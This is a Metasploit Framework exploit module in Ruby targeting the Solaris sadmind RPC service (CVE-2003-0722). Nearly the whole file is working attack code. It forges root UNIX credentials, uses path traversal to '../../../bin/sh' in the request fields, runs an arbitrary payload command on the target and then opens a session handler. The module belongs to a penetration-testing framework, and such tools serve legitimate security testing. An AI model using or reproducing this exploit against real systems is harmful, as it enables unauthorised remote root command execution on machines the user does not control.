##
# $Id: sadmind_exec.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris sadmind Command Execution',
'Description' => %q{
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
Vulnerable systems include solaris 2.7, 8, and 9
},
'Author' => [ 'vlad902 <vlad902@gmail.com>', 'hdm', 'cazz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
['CVE', '2003-0722'],
['OSVDB', '4585'],
['BID', '8615'],
['URL', 'http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DisclosureDate' => 'Sep 13 2003',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
sunrpc_create('udp', 100232, 10)
sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])
if !datastore['HOSTNAME']
print_status('attempting to determine hostname')
response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
if !response
print_error('no response')
return
end
match = /Security exception on host (.*)\. USER/.match(response)
if match
hostname = match.captures[0]
print_status("found hostname: #{hostname}")
else
print_error('unable to determine hostname')
return
end
else
hostname = datastore['HOSTNAME']
end
response = sadmind_request(hostname, payload.encoded)
sunrpc_destroy
if /Security exception on host/.match(response)
print_error('exploit failed')
return
else
print_status('exploit did not give us an error, this is good...')
select(nil,nil,nil,1)
handler
end
end
def sadmind_request(host, command)
header =
XDR.encode(0) * 7 +
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
host, 'system', '../../../bin/sh')
body =
do_int('ADM_FW_VERSION', 1) +
do_string('ADM_LANG', 'C') +
do_string('ADM_REQUESTID', '00009:000000000:0') +
do_string('ADM_CLASS', 'system') +
do_string('ADM_CLASS_VERS', '2.1') +
do_string('ADM_METHOD', '../../../bin/sh') +
do_string('ADM_HOST', host) +
do_string('ADM_CLIENT_HOST', host) +
do_string('ADM_CLIENT_DOMAIN', '') +
do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
do_int('ADM_FENCE', 0) +
do_string('X', '-c') +
do_string('Y', command) +
XDR.encode('netmgt_endofargs')
request = header + XDR.encode(header.length + body.length - 326) + body
ret = sunrpc_call(1, request)
return XDR.decode!(ret, Integer, Integer, String)[2]
end
def do_string(str1, str2)
XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
XDR.encode(str, 3, 4, int, 0, 0)
end
end